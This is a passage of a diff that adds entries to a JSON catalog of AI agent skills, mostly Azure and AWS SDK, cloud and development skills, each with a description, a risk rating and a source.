+ "description": "Senior embedded software engineer specializing in firmware and driver development for ARM Cortex-M microcontrollers (Teensy, STM32, nRF52, SAMD).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "asana-automation",
+ "path": "skills/asana-automation",
+ "category": "uncategorized",
+ "name": "asana-automation",
+ "description": "Automate Asana tasks via Rube MCP (Composio): tasks, projects, sections, teams, workspaces. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "async-python-patterns",
+ "path": "skills/async-python-patterns",
+ "category": "uncategorized",
+ "name": "async-python-patterns",
+ "description": "Master Python asyncio, concurrent programming, and async/await patterns for high-performance applications. Use when building async APIs, concurrent systems, or I/O-bound applications requiring non-...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "attack-tree-construction",
+ "path": "skills/attack-tree-construction",
+ "category": "uncategorized",
+ "name": "attack-tree-construction",
+ "description": "Build comprehensive attack trees to visualize threat paths. Use when mapping attack scenarios, identifying defense gaps, or communicating security risks to stakeholders.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "audio-transcriber",
+ "path": "skills/audio-transcriber",
+ "category": "content",
+ "name": "audio-transcriber",
+ "description": "Transform audio recordings into professional Markdown documentation with intelligent summaries using LLM integration",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "auth-implementation-patterns",
+ "path": "skills/auth-implementation-patterns",
+ "category": "uncategorized",
+ "name": "auth-implementation-patterns",
+ "description": "Master authentication and authorization patterns including JWT, OAuth2, session management, and RBAC to build secure, scalable access control systems. Use when implementing auth systems, securing A...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "automate-whatsapp",
+ "path": "skills/automate-whatsapp",
+ "category": "uncategorized",
+ "name": "automate-whatsapp",
+ "description": "Build WhatsApp automations with Kapso workflows: configure WhatsApp triggers, edit workflow graphs, manage executions, deploy functions, and use databases/integrations for state. Use when automatin...",
+ "risk": "safe",
+ "source": "https://github.com/gokapso/agent-skills/tree/master/skills/automate-whatsapp",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "autonomous-agent-patterns",
+ "path": "skills/autonomous-agent-patterns",
+ "category": "uncategorized",
+ "name": "autonomous-agent-patterns",
+ "description": "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "autonomous-agents",
+ "path": "skills/autonomous-agents",
+ "category": "uncategorized",
+ "name": "autonomous-agents",
+ "description": "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it'...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "avalonia-layout-zafiro",
+ "path": "skills/avalonia-layout-zafiro",
+ "category": "uncategorized",
+ "name": "avalonia-layout-zafiro",
+ "description": "Guidelines for modern Avalonia UI layout using Zafiro.Avalonia, emphasizing shared styles, generic components, and avoiding XAML redundancy.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "avalonia-viewmodels-zafiro",
+ "path": "skills/avalonia-viewmodels-zafiro",
+ "category": "uncategorized",
+ "name": "avalonia-viewmodels-zafiro",
+ "description": "Optimal ViewModel and Wizard creation patterns for Avalonia using Zafiro and ReactiveUI.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "avalonia-zafiro-development",
+ "path": "skills/avalonia-zafiro-development",
+ "category": "uncategorized",
+ "name": "avalonia-zafiro-development",
+ "description": "Mandatory skills, conventions, and behavioral rules for Avalonia UI development using the Zafiro toolkit.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-compliance-checker",
+ "path": "skills/security/aws-compliance-checker",
+ "category": "security",
+ "name": "aws-compliance-checker",
+ "description": "Automated compliance checking against CIS, PCI-DSS, HIPAA, and SOC 2 benchmarks",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-cost-cleanup",
+ "path": "skills/aws-cost-cleanup",
+ "category": "uncategorized",
+ "name": "aws-cost-cleanup",
+ "description": "Automated cleanup of unused AWS resources to reduce costs",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-cost-optimizer",
+ "path": "skills/aws-cost-optimizer",
+ "category": "uncategorized",
+ "name": "aws-cost-optimizer",
+ "description": "Comprehensive AWS cost analysis and optimization recommendations using AWS CLI and Cost Explorer",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-iam-best-practices",
+ "path": "skills/security/aws-iam-best-practices",
+ "category": "security",
+ "name": "aws-iam-best-practices",
+ "description": "IAM policy review, hardening, and least privilege implementation",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-penetration-testing",
+ "path": "skills/aws-penetration-testing",
+ "category": "uncategorized",
+ "name": "aws-penetration-testing",
+ "description": "This skill should be used when the user asks to \"pentest AWS\", \"test AWS security\", \"enumerate IAM\", \"exploit cloud infrastructure\", \"AWS privilege escalation\", \"S3 bucket testing...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-secrets-rotation",
+ "path": "skills/security/aws-secrets-rotation",
+ "category": "security",
+ "name": "aws-secrets-rotation",
+ "description": "Automate AWS secrets rotation for RDS, API keys, and credentials",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-security-audit",
+ "path": "skills/security/aws-security-audit",
+ "category": "security",
+ "name": "aws-security-audit",
+ "description": "Comprehensive AWS security posture assessment using AWS CLI and security best practices",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-serverless",
+ "path": "skills/aws-serverless",
+ "category": "uncategorized",
+ "name": "aws-serverless",
+ "description": "Specialized skill for building production-ready serverless applications on AWS. Covers Lambda functions, API Gateway, DynamoDB, SQS/SNS event-driven patterns, SAM/CDK deployment, and cold start opt...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "aws-skills",
+ "path": "skills/aws-skills",
+ "category": "uncategorized",
+ "name": "aws-skills",
+ "description": "AWS development with infrastructure automation and cloud architecture patterns",
+ "risk": "safe",
+ "source": "https://github.com/zxkane/aws-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azd-deployment",
+ "path": "skills/azd-deployment",
+ "category": "uncategorized",
+ "name": "azd-deployment",
+ "description": "Deploy containerized applications to Azure Container Apps using Azure Developer CLI (azd). Use when setting up azd projects, writing azure.yaml configuration, creating Bicep infrastructure for Cont...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-agents-persistent-dotnet",
+ "path": "skills/azure-ai-agents-persistent-dotnet",
+ "category": "uncategorized",
+ "name": "azure-ai-agents-persistent-dotnet",
+ "description": "Azure AI Agents Persistent SDK for .NET. Low-level SDK for creating and managing AI agents with threads, messages, runs, and tools.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-agents-persistent-java",
+ "path": "skills/azure-ai-agents-persistent-java",
+ "category": "uncategorized",
+ "name": "azure-ai-agents-persistent-java",
+ "description": "Azure AI Agents Persistent SDK for Java. Low-level SDK for creating and managing AI agents with threads, messages, runs, and tools.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-anomalydetector-java",
+ "path": "skills/azure-ai-anomalydetector-java",
+ "category": "uncategorized",
+ "name": "azure-ai-anomalydetector-java",
+ "description": "Build anomaly detection applications with Azure AI Anomaly Detector SDK for Java. Use when implementing univariate/multivariate anomaly detection, time-series analysis, or AI-powered monitoring.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-contentsafety-java",
+ "path": "skills/azure-ai-contentsafety-java",
+ "category": "uncategorized",
+ "name": "azure-ai-contentsafety-java",
+ "description": "Build content moderation applications with Azure AI Content Safety SDK for Java. Use when implementing text/image analysis, blocklist management, or harm detection for hate, violence, sexual conten...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-contentsafety-py",
+ "path": "skills/azure-ai-contentsafety-py",
+ "category": "uncategorized",
+ "name": "azure-ai-contentsafety-py",
+ "description": "Azure AI Content Safety SDK for Python. Use for detecting harmful content in text and images with multi-severity classification.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-contentsafety-ts",
+ "path": "skills/azure-ai-contentsafety-ts",
+ "category": "uncategorized",
+ "name": "azure-ai-contentsafety-ts",
+ "description": "Analyze text and images for harmful content using Azure AI Content Safety (@azure-rest/ai-content-safety). Use when moderating user-generated content, detecting hate speech, violence, sexual conten...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-contentunderstanding-py",
+ "path": "skills/azure-ai-contentunderstanding-py",
+ "category": "uncategorized",
+ "name": "azure-ai-contentunderstanding-py",
+ "description": "Azure AI Content Understanding SDK for Python. Use for multimodal content extraction from documents, images, audio, and video.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-document-intelligence-dotnet",
+ "path": "skills/azure-ai-document-intelligence-dotnet",
+ "category": "uncategorized",
+ "name": "azure-ai-document-intelligence-dotnet",
+ "description": "Azure AI Document Intelligence SDK for .NET. Extract text, tables, and structured data from documents using prebuilt and custom models.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-document-intelligence-ts",
+ "path": "skills/azure-ai-document-intelligence-ts",
+ "category": "uncategorized",
+ "name": "azure-ai-document-intelligence-ts",
+ "description": "Extract text, tables, and structured data from documents using Azure Document Intelligence (@azure-rest/ai-document-intelligence). Use when processing invoices, receipts, IDs, forms, or building cu...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-formrecognizer-java",
+ "path": "skills/azure-ai-formrecognizer-java",
+ "category": "uncategorized",
+ "name": "azure-ai-formrecognizer-java",
+ "description": "Build document analysis applications with Azure Document Intelligence (Form Recognizer) SDK for Java. Use when extracting text, tables, key-value pairs from documents, receipts, invoices, or buildi...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-ml-py",
+ "path": "skills/azure-ai-ml-py",
+ "category": "uncategorized",
+ "name": "azure-ai-ml-py",
+ "description": "Azure Machine Learning SDK v2 for Python. Use for ML workspaces, jobs, models, datasets, compute, and pipelines.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-openai-dotnet",
+ "path": "skills/azure-ai-openai-dotnet",
+ "category": "uncategorized",
+ "name": "azure-ai-openai-dotnet",
+ "description": "Azure OpenAI SDK for .NET. Client library for Azure OpenAI and OpenAI services. Use for chat completions, embeddings, image generation, audio transcription, and assistants.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-projects-dotnet",
+ "path": "skills/azure-ai-projects-dotnet",
+ "category": "uncategorized",
+ "name": "azure-ai-projects-dotnet",
+ "description": "Azure AI Projects SDK for .NET. High-level client for Azure AI Foundry projects including agents, connections, datasets, deployments, evaluations, and indexes.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-projects-java",
+ "path": "skills/azure-ai-projects-java",
+ "category": "uncategorized",
+ "name": "azure-ai-projects-java",
+ "description": "Azure AI Projects SDK for Java. High-level SDK for Azure AI Foundry project management including connections, datasets, indexes, and evaluations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-projects-py",
+ "path": "skills/azure-ai-projects-py",
+ "category": "uncategorized",
+ "name": "azure-ai-projects-py",
+ "description": "Build AI applications using the Azure AI Projects Python SDK (azure-ai-projects). Use when working with Foundry project clients, creating versioned agents with PromptAgentDefinition, running evalua...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-projects-ts",
+ "path": "skills/azure-ai-projects-ts",
+ "category": "uncategorized",
+ "name": "azure-ai-projects-ts",
+ "description": "Build AI applications using Azure AI Projects SDK for JavaScript (@azure/ai-projects). Use when working with Foundry project clients, agents, connections, deployments, datasets, indexes, evaluation...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-textanalytics-py",
+ "path": "skills/azure-ai-textanalytics-py",
+ "category": "uncategorized",
+ "name": "azure-ai-textanalytics-py",
+ "description": "Azure AI Text Analytics SDK for sentiment analysis, entity recognition, key phrases, language detection, PII, and healthcare NLP. Use for natural language processing on text.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-transcription-py",
+ "path": "skills/azure-ai-transcription-py",
+ "category": "uncategorized",
+ "name": "azure-ai-transcription-py",
+ "description": "Azure AI Transcription SDK for Python. Use for real-time and batch speech-to-text transcription with timestamps and diarization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-translation-document-py",
+ "path": "skills/azure-ai-translation-document-py",
+ "category": "uncategorized",
+ "name": "azure-ai-translation-document-py",
+ "description": "Azure AI Document Translation SDK for batch translation of documents with format preservation. Use for translating Word, PDF, Excel, PowerPoint, and other document formats at scale.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-translation-text-py",
+ "path": "skills/azure-ai-translation-text-py",
+ "category": "uncategorized",
+ "name": "azure-ai-translation-text-py",
+ "description": "Azure AI Text Translation SDK for real-time text translation, transliteration, language detection, and dictionary lookup. Use for translating text content in applications.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-translation-ts",
+ "path": "skills/azure-ai-translation-ts",
+ "category": "uncategorized",
+ "name": "azure-ai-translation-ts",
+ "description": "Build translation applications using Azure Translation SDKs for JavaScript (@azure-rest/ai-translation-text, @azure-rest/ai-translation-document). Use when implementing text translation, transliter...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-vision-imageanalysis-java",
+ "path": "skills/azure-ai-vision-imageanalysis-java",
+ "category": "uncategorized",
+ "name": "azure-ai-vision-imageanalysis-java",
+ "description": "Build image analysis applications with Azure AI Vision SDK for Java. Use when implementing image captioning, OCR text extraction, object detection, tagging, or smart cropping.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-vision-imageanalysis-py",
+ "path": "skills/azure-ai-vision-imageanalysis-py",
+ "category": "uncategorized",
+ "name": "azure-ai-vision-imageanalysis-py",
+ "description": "Azure AI Vision Image Analysis SDK for captions, tags, objects, OCR, people detection, and smart cropping. Use for computer vision and image understanding tasks.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-voicelive-dotnet",
+ "path": "skills/azure-ai-voicelive-dotnet",
+ "category": "uncategorized",
+ "name": "azure-ai-voicelive-dotnet",
+ "description": "Azure AI Voice Live SDK for .NET. Build real-time voice AI applications with bidirectional WebSocket communication.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-voicelive-java",
+ "path": "skills/azure-ai-voicelive-java",
+ "category": "uncategorized",
+ "name": "azure-ai-voicelive-java",
+ "description": "Azure AI VoiceLive SDK for Java. Real-time bidirectional voice conversations with AI assistants using WebSocket.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-voicelive-py",
+ "path": "skills/azure-ai-voicelive-py",
+ "category": "uncategorized",
+ "name": "azure-ai-voicelive-py",
+ "description": "Build real-time voice AI applications using Azure AI Voice Live SDK (azure-ai-voicelive). Use this skill when creating Python applications that need real-time bidirectional audio communication with...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-ai-voicelive-ts",
+ "path": "skills/azure-ai-voicelive-ts",
+ "category": "uncategorized",
+ "name": "azure-ai-voicelive-ts",
+ "description": "Azure AI Voice Live SDK for JavaScript/TypeScript. Build real-time voice AI applications with bidirectional WebSocket communication.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-appconfiguration-java",
+ "path": "skills/azure-appconfiguration-java",
+ "category": "uncategorized",
+ "name": "azure-appconfiguration-java",
+ "description": "Azure App Configuration SDK for Java. Centralized application configuration management with key-value settings, feature flags, and snapshots.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-appconfiguration-py",
+ "path": "skills/azure-appconfiguration-py",
+ "category": "uncategorized",
+ "name": "azure-appconfiguration-py",
+ "description": "Azure App Configuration SDK for Python. Use for centralized configuration management, feature flags, and dynamic settings.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-appconfiguration-ts",
+ "path": "skills/azure-appconfiguration-ts",
+ "category": "uncategorized",
+ "name": "azure-appconfiguration-ts",
+ "description": "Build applications using Azure App Configuration SDK for JavaScript (@azure/app-configuration). Use when working with configuration settings, feature flags, Key Vault references, dynamic refresh, o...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-communication-callautomation-java",
+ "path": "skills/azure-communication-callautomation-java",
+ "category": "uncategorized",
+ "name": "azure-communication-callautomation-java",
+ "description": "Build call automation workflows with Azure Communication Services Call Automation Java SDK. Use when implementing IVR systems, call routing, call recording, DTMF recognition, text-to-speech, or AI-...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-communication-callingserver-java",
+ "path": "skills/azure-communication-callingserver-java",
+ "category": "uncategorized",
+ "name": "azure-communication-callingserver-java",
+ "description": "Azure Communication Services CallingServer (legacy) Java SDK. Note - This SDK is deprecated. Use azure-communication-callautomation instead for new projects. Only use this skill when maintaining le...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-communication-chat-java",
+ "path": "skills/azure-communication-chat-java",
+ "category": "uncategorized",
+ "name": "azure-communication-chat-java",
+ "description": "Build real-time chat applications with Azure Communication Services Chat Java SDK. Use when implementing chat threads, messaging, participants, read receipts, typing notifications, or real-time cha...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-communication-common-java",
+ "path": "skills/azure-communication-common-java",
+ "category": "uncategorized",
+ "name": "azure-communication-common-java",
+ "description": "Azure Communication Services common utilities for Java. Use when working with CommunicationTokenCredential, user identifiers, token refresh, or shared authentication across ACS services.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-communication-sms-java",
+ "path": "skills/azure-communication-sms-java",
+ "category": "uncategorized",
+ "name": "azure-communication-sms-java",
+ "description": "Send SMS messages with Azure Communication Services SMS Java SDK. Use when implementing SMS notifications, alerts, OTP delivery, bulk messaging, or delivery reports.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-compute-batch-java",
+ "path": "skills/azure-compute-batch-java",
+ "category": "uncategorized",
+ "name": "azure-compute-batch-java",
+ "description": "Azure Batch SDK for Java. Run large-scale parallel and HPC batch jobs with pools, jobs, tasks, and compute nodes.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-containerregistry-py",
+ "path": "skills/azure-containerregistry-py",
+ "category": "uncategorized",
+ "name": "azure-containerregistry-py",
+ "description": "Azure Container Registry SDK for Python. Use for managing container images, artifacts, and repositories.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-cosmos-db-py",
+ "path": "skills/azure-cosmos-db-py",
+ "category": "uncategorized",
+ "name": "azure-cosmos-db-py",
+ "description": "Build Azure Cosmos DB NoSQL services with Python/FastAPI following production-grade patterns. Use when implementing database client setup with dual auth (DefaultAzureCredential + emulator), service...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-cosmos-java",
+ "path": "skills/azure-cosmos-java",
+ "category": "uncategorized",
+ "name": "azure-cosmos-java",
+ "description": "Azure Cosmos DB SDK for Java. NoSQL database operations with global distribution, multi-model support, and reactive patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-cosmos-py",
+ "path": "skills/azure-cosmos-py",
+ "category": "uncategorized",
+ "name": "azure-cosmos-py",
+ "description": "Azure Cosmos DB SDK for Python (NoSQL API). Use for document CRUD, queries, containers, and globally distributed data.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-cosmos-rust",
+ "path": "skills/azure-cosmos-rust",
+ "category": "uncategorized",
+ "name": "azure-cosmos-rust",
+ "description": "Azure Cosmos DB SDK for Rust (NoSQL API). Use for document CRUD, queries, containers, and globally distributed data.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-cosmos-ts",
+ "path": "skills/azure-cosmos-ts",
+ "category": "uncategorized",
+ "name": "azure-cosmos-ts",
+ "description": "Azure Cosmos DB JavaScript/TypeScript SDK (@azure/cosmos) for data plane operations. Use for CRUD operations on documents, queries, bulk operations, and container management.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-data-tables-java",
+ "path": "skills/azure-data-tables-java",
+ "category": "uncategorized",
+ "name": "azure-data-tables-java",
+ "description": "Build table storage applications with Azure Tables SDK for Java. Use when working with Azure Table Storage or Cosmos DB Table API for NoSQL key-value data, schemaless storage, or structured data at...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-data-tables-py",
+ "path": "skills/azure-data-tables-py",
+ "category": "uncategorized",
+ "name": "azure-data-tables-py",
+ "description": "Azure Tables SDK for Python (Storage and Cosmos DB). Use for NoSQL key-value storage, entity CRUD, and batch operations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventgrid-dotnet",
+ "path": "skills/azure-eventgrid-dotnet",
+ "category": "uncategorized",
+ "name": "azure-eventgrid-dotnet",
+ "description": "Azure Event Grid SDK for .NET. Client library for publishing and consuming events with Azure Event Grid. Use for event-driven architectures, pub/sub messaging, CloudEvents, and EventGridEvents.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventgrid-java",
+ "path": "skills/azure-eventgrid-java",
+ "category": "uncategorized",
+ "name": "azure-eventgrid-java",
+ "description": "Build event-driven applications with Azure Event Grid SDK for Java. Use when publishing events, implementing pub/sub patterns, or integrating with Azure services via events.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventgrid-py",
+ "path": "skills/azure-eventgrid-py",
+ "category": "uncategorized",
+ "name": "azure-eventgrid-py",
+ "description": "Azure Event Grid SDK for Python. Use for publishing events, handling CloudEvents, and event-driven architectures.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventhub-dotnet",
+ "path": "skills/azure-eventhub-dotnet",
+ "category": "uncategorized",
+ "name": "azure-eventhub-dotnet",
+ "description": "Azure Event Hubs SDK for .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventhub-java",
+ "path": "skills/azure-eventhub-java",
+ "category": "uncategorized",
+ "name": "azure-eventhub-java",
+ "description": "Build real-time streaming applications with Azure Event Hubs SDK for Java. Use when implementing event streaming, high-throughput data ingestion, or building event-driven architectures.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventhub-py",
+ "path": "skills/azure-eventhub-py",
+ "category": "uncategorized",
+ "name": "azure-eventhub-py",
+ "description": "Azure Event Hubs SDK for Python streaming. Use for high-throughput event ingestion, producers, consumers, and checkpointing.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventhub-rust",
+ "path": "skills/azure-eventhub-rust",
+ "category": "uncategorized",
+ "name": "azure-eventhub-rust",
+ "description": "Azure Event Hubs SDK for Rust. Use for sending and receiving events, streaming data ingestion.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-eventhub-ts",
+ "path": "skills/azure-eventhub-ts",
+ "category": "uncategorized",
+ "name": "azure-eventhub-ts",
+ "description": "Build event streaming applications using Azure Event Hubs SDK for JavaScript (@azure/event-hubs). Use when implementing high-throughput event ingestion, real-time analytics, IoT telemetry, or event...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-functions",
+ "path": "skills/azure-functions",
+ "category": "uncategorized",
+ "name": "azure-functions",
+ "description": "Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-identity-dotnet",
+ "path": "skills/azure-identity-dotnet",
+ "category": "uncategorized",
+ "name": "azure-identity-dotnet",
+ "description": "Azure Identity SDK for .NET. Authentication library for Azure SDK clients using Microsoft Entra ID. Use for DefaultAzureCredential, managed identity, service principals, and developer credentials.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-identity-java",
+ "path": "skills/azure-identity-java",
+ "category": "uncategorized",
+ "name": "azure-identity-java",
+ "description": "Azure Identity Java SDK for authentication with Azure services. Use when implementing DefaultAzureCredential, managed identity, service principal, or any Azure authentication pattern in Java applic...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-identity-py",
+ "path": "skills/azure-identity-py",
+ "category": "uncategorized",
+ "name": "azure-identity-py",
+ "description": "Azure Identity SDK for Python authentication. Use for DefaultAzureCredential, managed identity, service principals, and token caching.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-identity-rust",
+ "path": "skills/azure-identity-rust",
+ "category": "uncategorized",
+ "name": "azure-identity-rust",
+ "description": "Azure Identity SDK for Rust authentication. Use for DeveloperToolsCredential, ManagedIdentityCredential, ClientSecretCredential, and token-based authentication.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-identity-ts",
+ "path": "skills/azure-identity-ts",
+ "category": "uncategorized",
+ "name": "azure-identity-ts",
+ "description": "Authenticate to Azure services using Azure Identity SDK for JavaScript (@azure/identity). Use when configuring authentication with DefaultAzureCredential, managed identity, service principals, or i...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-keyvault-certificates-rust",
+ "path": "skills/azure-keyvault-certificates-rust",
+ "category": "uncategorized",
+ "name": "azure-keyvault-certificates-rust",
+ "description": "Azure Key Vault Certificates SDK for Rust. Use for creating, importing, and managing certificates.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-keyvault-keys-rust",
+ "path": "skills/azure-keyvault-keys-rust",
+ "category": "uncategorized",
+ "name": "azure-keyvault-keys-rust",
+ "description": "Azure Key Vault Keys SDK for Rust. Use for creating, managing, and using cryptographic keys. Triggers: \"keyvault keys rust\", \"KeyClient rust\", \"create key rust\", \"encrypt rust\", \"sign rust\".",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-keyvault-keys-ts",
+ "path": "skills/azure-keyvault-keys-ts",
+ "category": "uncategorized",
+ "name": "azure-keyvault-keys-ts",
+ "description": "Manage cryptographic keys using Azure Key Vault Keys SDK for JavaScript (@azure/keyvault-keys). Use when creating, encrypting/decrypting, signing, or rotating keys.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-keyvault-py",
+ "path": "skills/azure-keyvault-py",
+ "category": "uncategorized",
+ "name": "azure-keyvault-py",
